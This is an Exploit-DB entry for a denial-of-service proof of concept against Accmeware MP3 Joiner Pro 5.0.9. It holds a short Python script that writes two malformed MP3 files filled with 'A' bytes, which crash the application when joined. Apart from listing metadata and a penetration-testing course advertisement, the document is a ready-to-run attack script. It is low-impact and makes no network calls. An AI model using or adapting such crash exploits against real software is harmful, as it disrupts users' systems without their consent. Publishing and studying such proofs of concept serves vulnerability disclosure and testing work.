Accmeware MP3 Joiner Pro 5.0.9 - Denial of Service (PoC)

EDB-ID:

15786

CVE:

N/A


Author:

0v3r

Type:

dos


Platform:

Windows

Date:

2010-12-20


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

# Exploit Title: Accmeware MP3 Joiner Pro 5.0.9 DoS PoC
# Date: 12/20/2010
# Author: 0v3r
# Software Link: http://www.mp3-joiner.net/Files/MJPSetup.exe
# Version: 5.0.9
# Tested on: Windows XP SP3 EN (VirtualBxox)
# CVE: N/A

# The application crashes when trys to join two malformed mp3 files

#!/usr/bin/python

buff 	 = "\x41" * 1000

try:
 	f = open("1.mp3",'w')
	f.write(buff)
	f.close()
	f = open("2.mp3",'w')
        f.write(buff)
        f.close()

	print "Vulnerable files created!..."
	print "Insert mp3 files into the application and select join\n"
except:
	print "Error occured!"